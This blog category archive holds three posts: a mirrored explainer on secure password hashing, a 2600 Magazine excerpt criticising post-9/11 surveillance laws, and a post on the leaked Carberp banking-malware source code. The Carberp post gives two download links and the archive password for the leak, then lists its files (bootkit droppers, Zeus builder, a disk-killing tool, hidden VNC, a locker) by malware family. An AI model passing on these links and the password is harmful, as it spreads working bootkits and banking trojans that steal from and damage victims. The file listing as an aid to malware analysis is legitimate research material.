Archive for the ‘Information Security’ Category

This is a mirror of a post originally found here: 

http://security.stackexchange.com/questions/211/how-to-securely-hash-passwords/31846#31846

The Theory

We need to hash passwords as a second line of defence. A server which can authenticate users necessarily contains, somewhere in its entrails, some data which can be used to validate a password. A very simple system would just store the passwords themselves, and validation would be a simple comparison. But if an hostile outsider gains a simple glimpse at the contents of the file or database table which contains the passwords, then that attacker learns a lot. Unfortunately, such partial, read-only breaches do occur in practice (a mislaid backup tape, a decommissioned but not wiped out hard disk, as an aftermath of a SQL injection attack… the possibilities are numerous). See this blog post for a detailed discussion.

Since the overall contents of a server which can validate passwords are necessarily sufficient to, indeed, validate passwords, an attacker who got a read-only snapshot of the server is in position to make anoffline dictionary attack: he tries potential passwords until a match is found. We cannot avoid that. So we will want to make that kind of attack as hard as possible. Our tools are the following:

  • Cryptographic hash functions: these are fascinating mathematical objects which everybody can compute efficiently, and yet nobody knows how to invert them. This looks good for our problem: the server could store a hash of a password; when presented with a putative password, the server just has to hash it to see if it gets the same value; and yet, knowing the hash does not reveal the password itself.
  • Salts: among the advantages of the attacker over the defender, is parallelism. The attacker usually grabs a whole list of hashed passwords, and is interested in breaking as many of them as possible. He may try to attack several in parallels. For instance, the attacker may consider one potential password, hash it, and then compare the value with 100 hashed passwords; this means that the attacker shares the cost of hashing over several attacked passwords. A similar optimisation isprecomputed tables, including rainbow tables; this is still parallelism, with a space-time change of coordinates.The common characteristic of all attacks which use parallelism is that they work over several passwords which were processed with the exact same hash functionSalting is about using notone hash function, but a lot of distinct hash functions; ideally, each instance of password hashing should use its own hash function. A salt is a way to select a specific hash function among a big family of hash functions. Properly applied salts will completely thwart parallel attacks (including rainbow tables).
  • Slowness: computers become faster over time (Gordon Moore, co-founder of Intel, theorized it in his famous law). Human brains do not. This means that attackers can “try” more and more potential passwords as years pass, while users cannot remember more and more complex passwords (or flatly refuse to). To counter that trend, we can make hashing inherently slow by defining the hash function to use a lot of internal iterations (thousands, possibly millions).

We have a few standard cryptographic hash functions; most famous are MD5 and the SHA family. Building a secure hash function out of elementary operations is far from easy. When cryptographers want to do that, they think hard, then harder, and organize a tournament where the functions fight each other fiercely. When hundreds of cryptographers gnawed and scraped and punched at a function for several years and found nothing bad to say about it, then they begin to admit that maybe that specific function could be considered as more or less secure. This is just what happened in the SHA-3 competition. We have to use this way of designing hash function because we know no better way. Mathematically, we do not know if secure hash functions actually exist; we just have “candidates” (that’s the difference between “it cannot be broken” and “nobody in the world knows out to break it”).

A basic hash function, even if secure as a hash function, is not appropriate for password hashing, because:

  • it is unsalted, allowing for parallel attacks (rainbow tables for MD5 or SHA-1 can be obtained for free, you do not even need to recompute them yourself);
  • it is way too fast, and gets faster with technological advances. With a recent GPU (i.e. off-the-shelf consumer product which everybody can buy), hashing rate is counted in billions of passwords per second.

So we need something better. It so happens that slapping together a hash function and a salt, and iterating it, is not easier to do than designing a hash function — at least, if you want the result to be secure. There again, you have to rely on standard constructions which have survived the continuous onslaught of vindicative cryptographers.

Good Password Hashing Functions

PBKDF2

PBKDF2 comes from PKCS#5. It is parameterized with an iteration count (an integer, at least 1, no upper limit), a salt (an arbitrary sequence of bytes, no constraint on length), a required output length (PBKDF2 can generate an output of configurable length), and an “underlying PRF”. In practice, PBKDF2 is always used with HMAC, which is itself a construction which is built over an underlying hash function. So when we say “PBKDF2 with SHA-1”, we actually mean “PBKDF2 with HMAC with SHA-1”.

Advantages of PBKDF2:

  • Has been specified for a long time, seems unscathed for now.
  • Is already implemented in various framework (e.g. it is provided with .NET).
  • Highly configurable (although some implementations do not let you choose the hash function, e.g. the one in .NET is for SHA-1 only).
  • Received NIST blessings (modulo the difference between hashing and key derivation; see later on).
  • Configurable output length (again, see later on).

Drawbacks of PBKDF2:

  • CPU-intensive only, thus amenable to high optimization with GPU (the defender is a basic server which does generic things, i.e. a PC, but the attacker can spend his budget on more specialized hardware, which will give him an edge).
  • You still have to manage the parameters yourself (salt generation and storage, iteration count encoding…). There is a standard encoding for PBKDF2 parameters but it uses ASN.1 so most people will avoid it if they can (ASN.1 can be tricky to handle for the non-expert).

bcrypt

bcrypt was designed by reusing and expanding elements of a block cipher called Blowfish. The iteration count is a power of two, which is a tad less configurable than PBKDF2, but sufficiently so nevertheless. This is the core password hashing mechanism in the OpenBSD operating system.

Advantages of bcrypt:

  • Many available implementations in various languages (see the links at the end of the Wikipedia page).
  • More resilient to GPU; this is due to details of its internal design. The bcrypt authors made it so voluntarily: they reused Blowfish because Blowfish was based on an internal RAM table which is constantly accessed and modified throughout the processing. This makes life much harder for whoever wants to speed up bcrypt with a GPU (GPU are not good at making a lot of memory accesses in parallel). See here for some discussion.
  • Standard output encoding which includes the salt, the iteration count and the output as one simple to store character string of printable characters.

Drawbacks of bcrypt:

  • Output size is fixed: 192 bits.
  • While bcrypt is good at thwarting GPU, it can still be thoroughly optimized with FPGA: modern FPGA chips have a lot of small embedded RAM blocks which are very convenient for running many bcrypt implementations in parallel within one chip. It has been done.
  • Input password size is limited to 51 characters. In order to handle longer passwords, one has tocombine bcrypt with a hash function (you hash the password and then use the hash value as the “password” for bcrypt). Combining cryptographic primitives is known to be dangerous (see above) so such games cannot be recommended on a general basis.

scrypt

scrypt is a much newer construction (designed in 2009) which builds over PBKDF2 and a stream cipher called Salsa20/8, but these are just tools around the core strength of scrypt, which is RAM. scrypt has been designed to inherently use a lot of RAM (it generates some pseudo-random bytes, then repeatedly read them in a pseudo-random sequence). “Lots of RAM” is something which is hard to make parallel. A basic PC is good at RAM access, and will not try to read dozens of unrelated RAM bytes simultaneously. An attacker with a GPU or a FPGA will want to do that, and will find it difficult.

Advantages of scrypt:

  • A PC, i.e. exactly what the defender will use when hashing passwords, is the most efficient platform (or close enough) for computing scrypt. The attacker no longer gets a boost by spending his dollars on GPU or FPGA.
  • One more way to tune the function: memory size.

Drawbacks of scrypt:

  • Still new (my own rule of thumb is to wait at least 5 years of general exposure, so no scrypt for production until 2014 — but, of course, it is best if other people try scrypt in production, because this gives extra exposure).
  • Not as many available, ready-to-use implementations for various languages.
  • Unclear whether the CPU / RAM mix is optimal. For each of the pseudo-random RAM accesses, scrypt still computes a hash function. A cache miss will be about 200 clock cycles, one SHA-256 invocation is close to 1000. There may be room for improvement here.
  • Yet another parameter to configure: memory size.

OpenPGP Iterated And Salted S2K

I cite this one because you will use it if you do password-based file encryption with GnuPG. That tool follows the OpenPGP format which defines its own password hashing functions, called “Simple S2K”, “Salted S2K” and “Iterated and Salted S2K“. Only the third one can be deemed “good” in the context of this answer. It is defined as the hash of a very long string (configurable, up to about 65 megabytes) consisting of the repetition of an 8-byte salt and the password.

As far as these things go, OpenPGP’s Iterated And Salted S2K is decent; it can be considered as similar to PBKDF2, with less configurability. You will very rarely encounter it outside of OpenPGP, as a stand-alone function.

Unix “crypt”

Recent Unix-like systems (e.g. Linux), for validating user passwords, use iterated and salted variants of the crypt() function based on good hash functions, with thousands of iterations. This is reasonably good. Some systems can also use bcrypt, which is better.

The old crypt() function, based on the DES block cipher, is not good enough:

  • It is slow in software but fast in hardware, and can be made fast in software too but only when computing several instances in parallel (technique known as SWAR or “bitslicing”). Thus, the attacker is at an advantage.
  • It is still quite fast, with only 25 iterations.
  • It has a 12-bit salt, which means that salt reuse will occur quite often.
  • It truncates passwords to 8 characters (characters beyond the eighth are ignored) and it also drops the upper bit of each character (so you are more or less stuck with ASCII).

But the more recent variants, which are active by default, will be fine.

Bad Password Hashing Functions

About everything else, in particular virtually every homemade method that people relentlessly invent.

For some reason, many developers insist on designing function themselves, and seem to assume that “secure cryptographic design” means “throw together every kind of cryptographic or non-cryptographic operation that can be thought of”. See this question for an example. The underlying principle seems to be that the sheer complexity of the resulting utterly tangled mess of instruction will befuddle attackers. In practice, though, the developer himself will be more confused by his own creation than the attacker.

Complexity is bad. Homemade is bad. New is bad. If you remember that, you’ll avoid 99% of problems related to password hashing, or cryptography, or even security in general.

Password hashing in Windows operating systems is used to be mindbogglingly awful and now is just terrible (unsalted, non-iterated MD4).

Key Derivation

Up to now, we considered the question of hashing passwords. A close problem is about transforming a password into a symmetric key which can be used for encryption; this is called key derivation and is the first thing you do when you “encrypt a file with a password”.

It is possible to make contrived examples of password hashing functions which are secure for the purpose of storing a password validation token, but terrible when it comes to generating symmetric keys; and the converse is equally possible. But these examples are very “artificial”. For practical functions like the one described above:

  • The output of a password hashing function is acceptable as a symmetric key, after possible truncation to the required size.
  • A Key Derivation Function can serve as a password hashing function as long as the “derived key” is long enough to avoid “generic preimages” (the attacker is just lucky and finds a password which yields the same output). An output of more than 100 bits or so will be enough.

Indeed, PBKDF2 and scrypt are KDF, not password hashing function — and NIST “approves” of PBKDF2 as a KDF, not explicitly as a password hasher (but it is possible, with only a very minute amount of hypocrisy, to read NIST’s prose in such a way that it seems to say that PBKDF2 is good for hashing passwords).

Conversely, bcrypt is really a block cipher (the bulk of the password processing is the “key schedule”) which is then used in CTR mode to produce three blocks (i.e. 192 bits) of pseudo-random output, making it a kind of hash function. bcrypt can be turned into a KDF with a little surgery, by using the block cipher in CTR mode for more blocks. But, as usual, we cannot recommend such homemade transforms. Fortunately, 192 bits are already more than enough for most purposes (e.g. symmetric encryption withGCM or EAX only needs a 128-bit key).

Miscellaneous Topics

How many iterations ?

As much as possible ! This salted-and-slow hashing is an arms race between the attacker and the defender. You use many iterations to make the hashing of a password harder for everybody. To improve security, you should set that number as high as you can tolerate on your server, given the tasks that your server must otherwise fulfill. Higher is better.

Collisions and MD5

MD5 is broken: it is computationally easy to find a lot of pairs of distinct inputs which hash to the same value. These are called collisions.

However, collisions are not an issue for password hashing. Password hashing requires the hash function to be resistant to preimages, not to collisions. Collisions are about finding pairs of messages which give the same output without restriction, whereas in password hashing the attacker must find a message which yields a given output that the attacker does not get to choose. This is quite different. As far as we known, MD5 is still (almost) as strong as it has ever been with regards to preimages (there is atheoretical attack which is still very far in the ludicrously impossible to run in practice).

The real problem with MD5 as it is commonly used in password hashing is that it is very fast, and unsalted. However, PBKDF2 used with MD5 would be robust. You should still use SHA-1 or SHA-256 with PBKDF2, but for Public Relations. People get nervous when they hear “MD5”.

Salt Generation

The main and only point of the salt is to be as unique as possible. Whenever a salt value is reusedanywhere, this has the potential to help the attacker.

For instance, if you use the user name as salt, then an attacker (or several colluding attackers) could find it worthwhile to build rainbow tables which attack the password hashing function when the salt is “admin” (or “root” or “joe”) because there will be several, possibly many sites around the world which will have a user named “admin”. Similarly, when a user changes his password, he usually keeps his name, leading to salt reuse. Old passwords are valuable targets, because users have the habit of reusing passwords in several places (that’s known to be a bad idea, and advertised as such, but they will do it nonetheless because it makes their life easier), and also because people tend to generate their passwords “in sequence”: if you learn that Bob’s old password is “SuperSecretPassword37”, then Bob’scurrent password is probable “SuperSecretPassword38” or “SuperSecretPassword39”.

The cheap way to obtain uniqueness is to use randomness. If you generate your salt as a sequence of random bytes from the cryptographically secure PRNG that your operating system offers (/dev/urandomCryptGenRandom()…) then you will get salt values which will be “unique with a sufficiently high probability”. 16 bytes are enough so that you will never see a salt collision in your life, which is overkill but simple enough.

UUID are a standard way of generating “unique” values. Note that “version 4” UUID just use randomness (122 random bits), like explained above. A lot of programming frameworks offer simple to use functions to generate UUID on demand, and they can be used as salts.

Salt Secrecy

Salts are not meant to be secret; otherwise we would call them keys. You do not need to make salts public, but if you have to make them public (e.g. to support client-side hashing), then don’t worry too much about it. Salts are there for uniqueness. Strictly speaking, the salt is nothing more than the selection of a specific hash function within a big family of functions.

“Pepper”

Cryptographers can never let a metaphor alone; they must extend it with further analogies and bad puns. “Peppering” is about using a secret salt, i.e. a key. If you use a “pepper” in your password hashing function, then you are switching to a quite different kind of cryptographic algorithm; namely, you are computing a Message Authentication Code over the password. The MAC key is your “pepper”.

Peppering makes sense if you can have a secret key which the attacker will not be able to read. Remember that we use password hashing because we consider that an attacker could grab a copy of the server database, or possible of the whole disk of the server. A typical scenario would be a server with two disks in RAID 1. One disk fails (electronic board fries — this happens a lot). The sysadmin replaces the disk, the mirror is rebuilt, no data is lost due to the magic of RAID 1. Since the old disk is dysfunctional, the sysadmin cannot easily wipe its contents. He just discards the disk. The attacker searches through the garbage bags, retrieves the disk, replaces the board, and lo! He has a complete image of the whole server system, including database, configuration files, binaries, operating system… the full monty, as the British say. For peppering to be really applicable, you need to be in a special setup where there is something more than a PC with disks; you need a HSM. HSM are very expensive, both in hardware and in operational procedure. But with a HSM, you can just use a secret “pepper” and process passwords with a simple HMAC (e.g. with SHA-1 or SHA-256). This will be vastly more efficient than bcrypt/PBKDF2/scrypt and their cumbersome iterations. Also, usage of a HSM will look extremely professional when doing a WebTrust audit.

Client-side hashing

Since hashing is (deliberately) expensive, it could make sense, in a client-server situation, to harness the CPU of the connecting clients. After all, when 100 clients connect to a single server, the clients collectively have a lot more muscle than the server.

To perform client-side hashing, the communication protocol must be enhanced to support sending the salt back to the client. This implies an extra round-trip, when compared to the simple client-sends-password-to-server protocol. This may or may not be easy to add to your specific case.

Client-side hashing is difficult in a Web context because the client uses Javascript, which is quite anemic for CPU-intensive tasks.

In the context of SRP, password hashing necessarily occurs on the client side.

Conclusion

Use bcrypt. PBKDF2 is not bad either. If you use scrypt you will be a “slightly early adopter” with the risks that are implied by this expression; but it would be a good move for scientific progress (“crash dummy” is a very honourable profession).

Advertisements

While reviewing some old publications I came across this great article that was written just weeks after the 9/11 tragedy in NY.

Based on recent events disclosed around the PRISM program and US Government actions against privacy in general the article seems to be very scary with it’s foreshadowing.

Here is an excerpt taken from 2600 Magazine (Fall 2001):

It takes an event of great magnitude to really put things in perspective, to make us realize how insignificant our daily concerns can be. At the same time, such an occurrence can trigger a chain of events that wind up magnifying these concerns.

What is most disturbing is the speed with which things began to change after the attacks. It was as if members of Congress and other lawmakers were poised to spring into action the moment public opinion began to turn and before common sense had a chance of regaining its dominance. Within hours of the horrific events, new restrictions on everything from encryption to anonymity along with broad new powers allowing much easier wiretapping and monitoring of Internet traffic were being purposed – all with initial overwhelming support from the terrified public.

We find it absolutely unconscionable that anyone would use such a tragedy to further their own agenda – whether it be by selling a product or enacting a wish list of legislation. We’ve witnessed a good amount of both recently and its all pretty repugnant. Almost every new law purposed is something we’ve seen in the past – and rejected. And there is very little in them that would have been helpful in preventing the terrorist attacks in the first place.

Our concerns can best be summed up by this quote:
“Maybe the Senate wants to just go ahead and adopt new abilities to wiretap our citizens. Maybe they want to adopt new abilities to go into people’s computers. Maybe that will make us feel safer. Maybe. And maybe what the terrorists have done made us a little bit less safe. Maybe they have increased Big Brother in this country. If that is what the Senate wants, we can vote for it. But do we really show respect to the American people by slapping something together, something that nobody on the floor can explain, and say we are changing the duties of the Attorney General, the Director of the CIA, the U.S. attorneys, we are going to change your rights as Americans, your rights to privacy? We are going to do it with no hearings, no debate. We are going to do it with numbers on a page that nobody can understand.”

Those remarks came from Senator Patrick Leahy of Vermont, one of the few who seem to actually comprehend the serious risks we’re facing.

Today we are seeing the repercussions of the actions taken during that time, and now the train is running full speed so it will take a strong force to have any chance of derailing it.

This all reminds me of another quote from Philip K. Dick (also in 2600 Magazine Spring 2003):

…the essence of the evil government is that it anticipates bad conduct on the part of its citizens. Any government which assumes that the population is going to do something evil has already lost its franchise to govern. That tacit contract between a government and the people governed is that the government will trust the people and the people will trust the government. But once the government begins to mistrust the people it is governing, it loses its mandate to rule because it is no longer acting as a spokesman for the people, but is acting as an agent of persecution

Very interesting source code leak today for the Carberp malware family.
This black market malware once being offered for $40k will surely be of interest to anyone who conducts malware & botnet analysis. The leak included a few other tools that helped make it so successful like the bootloader, MC obfuscate, along with various functions taken from other malware source code like Zeus and Spyeye.

Which begs the question, how do we address the leakage and sharing of malware source code in the public domain?

Here is a more detailed story behind the leak: http://threatpost.com/carberp-source-code-leaked/

Here is more info on the information leaked:

Download
Link 1: http://multiupload.nl/A6CFLK4U6M (as of this posting this link seems dead)
Link 2: https://mega.co.nz/#!0YsXWBRD!CMqd9nrm1d0XABKlifI9vmxprpQ6RnfsdhBHeKrDXao (This one feels lucky!)

The password is:
Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh

Analysis of the package
Via kernelmode.info:

Ursnif related

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\VNCDLL.dll
pro\all source\TZ\vnc\VNCd.7z->VNCd/VNCDLL.dll
pro\source builder plugins inj’s modules etc\WndRec\vncdemo\VNCDLL.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\VNCd.7z->VNCd/VNCDLL.dll

Rovnix related (BKLoader itself)

pro\all source\bootkit.old\KLoader\release\i386\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\bksetup.exe
pro\all source\test\bootkit\1\bksetup.exe
pro\all source\test\bootkit\1\setupdll.dll
pro\all source\test\bootkit\bksetup.exe
pro\all source\test\bootkit\setupdll.dll
pro\all source\TZ\bootkit\bin\bksetup.exe
pro\all source\TZ\bootkit\bin\setupdll.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2\bin\release\i386\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\biin\BkSetup.dll
pro\all source\Инфа по буткиту\Бинарник БК\LatestBk\BK2.8.2_KIP\BK2.8.2_KIP\bin\release\i386\SetupDll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkSetup.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Release\setupdll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\BkSetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\bin\SetupDll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\bksetup.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Release\setupdll.dll
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/DrvTest.sys
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Rootkit.7z->DrvTest/debug/SpoolNetAdvr.sy_
pro\all source\bootkit\bin\Release\i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\driver_i386\kloader.sys
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\driver_i386\kloader.sys
pro\all source\TZ\bootkit\BK\bin\release\i386\kloader.sys
pro\all source\bootkit.old\KLoader\release\amd64\kloader.sys
pro\all source\BootkitDropper\nbuild\SrcDir\BkSetup.dll

Alureon related (dropper of old variants, still ITW)

pro\all source\DropSploit1.rar->DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1.rar->DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit1\out\builder_Release.exe
pro\all source\DropSploit1\out\Release\dropper.exe
pro\all source\DropSploit\out\builder_Release.exe
pro\all source\DropSploit\out\builder_Release.sys
pro\all source\DropSploit\out\dropper.dll
pro\all source\DropSploit\out\Release\dropper.dll
pro\all source\DropSploit\test\1\builder_Release.exe
pro\all source\DropSploit\test\2\builder_Release.exe
pro\all source\DropSploit\test\3\builder_Release.exe
pro\all source\DropSploit\test\5\builder_Release.exe
pro\all source\DropSploit\test\6\builder_Release.exe
pro\all source\DropSploit\test\7\builder_Release.exe
pro\all source\DropSploit\test\8\builder_Release.exe

Claywhist (VNC) related
pro\all source\RemoteCtl\Release\hvnc.exe

Phdet related

pro\all source\TZ\kill_os\bin\os_kill_debug.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\all source\TZ\kill_os\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\os_kill_src.7z->os_kill_src/bin/os_kill_debug.exe

Zeus related

pro\all source\GrabberIE_FF\Release\GrabberIE_FF.dll
pro\all source\temp\zeus src.rar->zeus src\output\builder\zsb.exe
pro\all source\temp\zeus src.rar->zeus src\output\client32.bin
pro\all source\ZeuS 2.0.8.9\output\builder\zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/builder/zsb.exe
pro\source builder plugins inj’s modules etc\Сорцы и Модули\zeus2089.7z->zeus2089/output/client32.bin

SpyEye related

pro\source builder plugins inj’s modules etc\Сорцы и Модули\spyinject2.zip->iehookdll_mod.dll
pro\all source\RemoteCtl\Release\rdp.dll
pro\all source\temp\rdp.dll
pro\all source\temp\rdp.exe
pro\all source\TZ\rdp\rdp.plug
pro\source builder plugins inj’s modules etc\plugs\rdp.plug

Vundo related

pro\all source\AgentFullTest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\new.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav2.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitRunBot.dll
pro\all source\BJWJ\Builds\Bin\Release\MiniLoader.exe
pro\all source\BJWJ\Builds\Bin\Release\new.exe
pro\all source\bootkit\BkBuild\BootkitRunBot.dll
pro\all source\Demo_Cur2\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Debug\RU.exe
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\WhiteJoe.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\WhiteJoe.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\BkInstaller.dll
pro\source builder plugins inj’s modules etc\ConfigBuilder\ConfigBuilder\ConfigBuilder.exe
pro\source builder plugins inj’s modules etc\ConfigBuilder\for test\ConfigBuilder.exe

Carberp itself

pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\disktest.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\FakeDll.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG1.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_DBG2.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_Az_FDI_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU_DBG.exe
pro\all source\BJWJ\Builds\Bin\Release\bki.plug
pro\all source\BJWJ\Builds\Bin\Release\bktest.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav.exe
pro\all source\BJWJ\Builds\Bin\Release\blockav1.exe
pro\all source\BJWJ\Builds\Bin\Release\bootkit.exe
pro\all source\BJWJ\Builds\Bin\Release\BootkitDropper.exe
pro\all source\BJWJ\Builds\Bin\Release\bot.plug
pro\all source\BJWJ\Builds\Bin\Release\docfind.exe
pro\all source\BJWJ\Builds\Bin\Release\first.plug
pro\all source\BJWJ\Builds\Bin\Release\Full.exe
pro\all source\BJWJ\Builds\Bin\Release\ifobstst.exe
pro\all source\BJWJ\Builds\Bin\Release\livrus.exe
pro\all source\BJWJ\Builds\Bin\Release\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release\mmm.exe
pro\all source\BJWJ\Builds\Bin\Release\mybot.exe
pro\all source\BJWJ\Builds\Bin\Release\mytest.exe
pro\all source\BJWJ\Builds\Bin\Release\ola.exe
pro\all source\BJWJ\Builds\Bin\Release\ola1.exe
pro\all source\BJWJ\Builds\Bin\Release\ola2.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az1.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_FDI.exe
pro\all source\BJWJ\Builds\Bin\Release\RU_Az_serg.exe
pro\all source\BJWJ\Builds\Bin\Release\second.plug
pro\all source\BJWJ\Builds\Bin\Release\test.exe
pro\all source\BJWJ\Builds\Bin\Release\testftp.exe
pro\all source\BJWJ\Builds\Bin\Release\testnew.exe
pro\all source\BJWJ\Builds\Bin\Release\testtt.exe
pro\all source\BJWJ\Builds\Bin\Release\tinytst.exe
pro\all source\BJWJ\Builds\Bin\Release\tst.exe
pro\all source\BJWJ\Builds\Bin\Release\vnctest.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec.exe
pro\all source\BJWJ\Builds\Bin\Release\wndrec2.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.exe
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoeRebootPing.exe
pro\all source\Bot Builder\WhiteJoeRebootPing.exe
pro\all source\temp\2012-07-04_FakeDllFiles\bot.plug
pro\all source\temp\marazm\Droper\WhiteJoe.exe
pro\all source\test\test\ola.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Bot.plug
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\Loader_dll.dll
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\SrcDir\WhiteJoeRebootPing.dll
pro\source builder plugins inj’s modules etc\Full.exe
pro\source builder plugins inj’s modules etc\Full_btc.exe
pro\source builder plugins inj’s modules etc\plugs\bki.plug
pro\source builder plugins inj’s modules etc\plugs\bki_log.plug
pro\source builder plugins inj’s modules etc\plugs\bot.plug
pro\source builder plugins inj’s modules etc\plugs\bot_log.plug
pro\source builder plugins inj’s modules etc\plugs\log\bki.plug
pro\source builder plugins inj’s modules etc\plugs\log\bot.plug
pro\source builder plugins inj’s modules etc\RU_Az_btc.exe
pro\source builder plugins inj’s modules etc\RU_Az_if.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\DBG_bot.plug
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\Full_SB_hnt.exe
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\RU.exe
pro\all source\BJWJ\Builds\Bin\Release\mmmm.exe
pro\all source\BJWJ\Builds\Bin\Release\RU.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_Cur2\WhiteJoe\Debug\WhiteJOE_Bank.exe
pro\all source\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Debug/WhiteJOE_Bank.exe
pro\all source\keys\Builds\Bin\Release\RU.exe
pro\source builder plugins inj’s modules etc\InjTest.exe
pro\all source\BJWJ\Builds\Bin\BootkitTest\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012.rar->build\Loader_dll.dll
pro\all source\temp\marazm\Droper\Droper_23.01.2012\build\Loader_dll.dll
pro\all source\BJWJ\Builds\Bin\Release DEBUGCONFIG\CoreDll.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoe.exe
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Debug\WhiteJoeRebootPing.exe
pro\all source\Demo_Cur.rar->Demo_Cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\Demo_cur_old.7z->WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\Locker\bin\Debug\locker.exe
pro\all source\temp\Demo_cur.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\temp\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\Demo_ifobs.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\Demo_iFOBS_src.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\dll\iFOBSBal\WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\iFobsLdr.7z->Demo_cur/WhiteJoe/Release/WhiteJOE_Bank.exe
pro\all source\TZ\ifobs\src2\Demo_cur\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\WndRec\output\log\IBank\1237\WhiteJoe\Release\WhiteJOE_Bank.exe
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoe.dll
pro\all source\BootkitDropper\Bin\RDEBUG_CONFIG\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\Bin\Release\WhiteJoeRebootPing.dll
pro\all source\BootkitDropper\nbuild\SrcDir\WhiteJoe.dll
pro\all source\bootkit\BkBuild\ping.dll
